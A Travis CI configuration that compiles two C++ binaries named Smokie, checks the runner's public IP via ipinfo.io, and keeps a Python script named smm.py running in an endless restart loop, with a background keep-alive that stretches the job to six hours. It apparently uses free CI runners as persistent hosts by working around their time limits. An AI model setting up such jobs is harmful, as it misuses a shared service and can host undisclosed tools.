os: linux
dist: focal
stages:
  - setup_and_run
  - wait_and_restart

jobs:
  include:
    - stage: setup_and_run
      script:
        - echo "Setting up environment..."
        - sudo apt-get update && sudo apt-get install -y gcc g++
        - pip install -r requirements.txt
        
        - echo "Compiling C++ files into binary..."
        - g++ raja.cpp another_file.cpp -o Smokie1 -std=c++11 -pthread
        - g++ raj.cpp another_file.cpp -o Smokie -std=c++11 -pthread || { echo "Compilation failed"; exit 1; }
        
        - chmod +x *
        
        - lscpu
        - curl ipinfo.io
        
        - echo "Starting Travis keep-alive..."
        - (while true; do 
            echo "Travis keep-alive... $(date)"; 
            sleep 300; 
          done) &
        
        - echo "Running the compiled binary with travis_wait..."
        - travis_wait 360 bash -c "while true; do python3 smm.py || { echo 'Application crashed. Restarting...'; sleep 5; }; done"
